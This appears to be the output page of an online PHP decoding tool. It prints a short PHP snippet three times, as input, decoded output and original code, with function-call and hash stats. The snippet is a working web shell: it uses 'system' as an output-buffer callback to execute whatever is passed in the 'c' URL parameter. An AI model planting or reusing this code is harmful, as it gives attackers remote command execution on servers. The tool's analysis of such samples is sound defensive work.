Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $cb= 'system'; ob_start($cb); echo $_GET[c]; ob_end_flush(); ?>..

Decoded Output download

<?php
    $cb= 'system';
    ob_start($cb);
    echo $_GET[c];
    ob_end_flush();
?>

Did this file decode correctly?

Original Code

<?php
    $cb= 'system';
    ob_start($cb);
    echo $_GET[c];
    ob_end_flush();
?>

Function Calls

ob_start 1

Variables

$cb system

Stats

MD5 40b21b2bd1c813d47e895226b9f573fc
Eval Count 0
Decode Time 109 ms